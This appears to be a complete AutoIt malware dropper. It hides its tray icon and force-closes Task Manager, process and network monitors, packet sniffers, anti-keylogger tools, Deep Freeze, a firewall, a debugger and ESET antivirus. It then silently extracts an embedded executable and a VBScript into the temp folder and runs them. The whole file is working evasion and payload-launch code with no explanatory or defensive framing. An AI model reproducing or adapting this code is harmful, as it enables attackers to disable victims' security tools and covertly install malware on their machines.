#NoTrayIcon
If ProcessExists("taskmgr.exe") Then
ProcessClose("taskmgr.exe")
EndIf
If ProcessExists("SpyTheSpy.exe") Then
ProcessClose("SpyTheSpy.exe")
EndIf
If ProcessExists("procexp.exe") Then
ProcessClose("procexp.exe")
EndIf
If ProcessExists("cports.exe") Then
ProcessClose("cports.exe")
EndIf
If ProcessExists("regshot.exe") Then
ProcessClose("regshot.exe")
EndIf
If ProcessExists("boda fire-wall.exe") Then
ProcessClose("boda fire-wall.exe")
EndIf
If ProcessExists("smsniff.exe") Then
ProcessClose("smsniff.exe")
EndIf
If ProcessExists("Armor2net.exe") Then
ProcessClose("Armor2net.exe")
EndIf
If ProcessExists("DF5Serv.exe") Then
ProcessClose("DF5Serv.exe")
EndIf
If ProcessExists("FrzState2k.exe") Then
ProcessClose("FrzState2k.exe")
EndIf
If ProcessExists("AntiLogger.exe") Then
ProcessClose("AntiLogger.exe")
EndIf
If ProcessExists("KeyScrambler.exe") Then
ProcessClose("KeyScrambler.exe")
EndIf
If ProcessExists("dumpcap.exe") Then
ProcessClose("dumpcap.exe")
EndIf
If ProcessExists("IDMan.exe") Then
ProcessClose("IDMan.exe")
EndIf
If ProcessExists("IEMonitor.exe") Then
ProcessClose("IEMonitor.exe")
EndIf
If ProcessExists("OLLYDBG.EXE") Then
ProcessClose("OLLYDBG.EXE")
EndIf
If ProcessExists("egui.exe") Then
ProcessClose("egui.exe")
EndIf
$alpha = @TempDir & "/x.exe"
$beta = @TempDir & "/z.vbs"
FileInstall("x.exe", $alpha)
Run($alpha)
FileInstall("z.vbs", $beta)
ShellExecute($beta)